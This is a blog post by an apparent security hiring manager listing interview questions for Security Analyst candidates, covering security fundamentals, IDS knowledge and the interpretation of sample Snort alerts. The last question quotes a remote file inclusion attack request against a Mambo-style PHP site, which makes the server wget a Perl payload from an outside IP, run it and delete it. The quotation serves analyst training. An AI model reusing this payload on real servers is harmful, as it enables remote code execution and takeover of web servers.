Conducted an interview session for few Security Analyst posts to be stationed at The Client site this morning. For today session, there were 4 candidates which at 1st I hope will be better than the last batch that I’ve interviewed for quite some times ago. These candidates were the one who passed the assessment test that they sat last friday morning. For those who wants to know what kind of question to be asked if I were the interviewer, below are those questions.

p/s: You’ll discover that most of the questions are not too details because mainly I’m looking for the ones who have sound security fundamental knowledge. (Btw most of the candidates will only “lopong/ternganga/tersengih” when asked lil bit detailed question such as why IPS is different from conventional firewall?-I know this is not a detailed question)
1) I would ask you to introduce yourself (Education background, family, skills etc)

-I would like to point out that most of the candidates tend to concentrate on their education background, family background, hobby etc but so far only few did mention their experience, knowledge, skills, interest, your goals, purpose of applying the job. So next time please remember that the interviewer wants to know how u expressing urself (for communication evaluation), your objectives, vision, mission of joining the company and others instead of knowing whut ur favourite meals, favourite colors, hobby and any other unrelated matters.

2). To test your basic security knowledge, the question would be either

a) What is your opinion regarding network security? or

b) What do you understand about ICT Security as a whole? or

c) In order to preserve the risk to the acceptable level, what do you think that would be a good security process practice?

3) What do you know about Security Analyst?(This question is regarding the post)

- I do expect that all the candidates at least do some research from the internet. It sounds ridiculous if yourself don’t even know about the job that you want to apply. Ever heard of google before?

4)What do you know about IDS? (Because we are using IDS)

a) Different between IDS and IPS

b) Experience/ hands-on training of using any IDS

c) Understand the mechanism of the IDS

d) Able to read/interprate/understand the signatures/rules. *Bonus
e) IDS Deployment *Bonus as well :) )

5) Only 2 questions. (I made some modifications and if you do noticed about the odd

[**] [1:2001717:0] ATTACK-RESPONSES id check returned userid [**]
[Classification: Bad-Unknown] [Priority: 1]
07/06-11:03:20.255841 10.14.3.3:53473 -> 23.143.3.3:443
TCP TTL:64 TOS:0×10 ID:40660 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCE0BDC22 Ack: 0x99984D5A Win: 0x5A8 TcpLen: 32
TCP Options (3) => NOP NOP TS: 62210806 42767499

[**] [1:2001717:0] ATTACK-RESPONSES id check returned root [**]
[Classification: Bad-Unknown] [Priority: 1]
07/06-11:03:20.255841 10.14.3.3.53473 -> 23.143.3.3:443
TCP TTL:64 TOS:0×10 ID:40660 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xCE0BDC22 Ack: 0x99984D5A Win: 0x5B4 TcpLen: 32
TCP Options (3) => NOP NOP TS: 62210806 42767499


Info on 23.143.3.3


HTTP/1.1 200 OK
Date: Sat, 17 June 2006 19:34:48 GMT
Server: Apache/2.2.0 (Unix)
Last-Modified: Sun, 09 Jul 2006 17:43:47 GMT
ETag: “20003-39aa-41829a3c27ac0″
Accept-Ranges: bytes
Content-Length: 14762
Cache-Control: max-age=86400
Expires: Sun, 16 Jul 2006 19:34:48 GMT
Content-Type: text/htm

What do u think about those alerts above?

and the other question would be :


/2006/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://66.111.211.183/~secilmis/memberz/cmd.txt?&cmd=cd%20/tmp;wget%20http://66.111.211.183/~secilmis/
memberz/travma;perl%20travma;rm%20-rf%20travma?
HTTP/1.0

What is/are the intention of the attacker?


What are the conditions that the attacker needs to know about the system in order to make sure that his attack is successful?

So that’s it. Hehehe. Anyway those questions are the basic questions. So from time to time based on your answer, perhaps we can venture lil bit further. Any comments on this questions? perhaps u can give more constructive questions as well.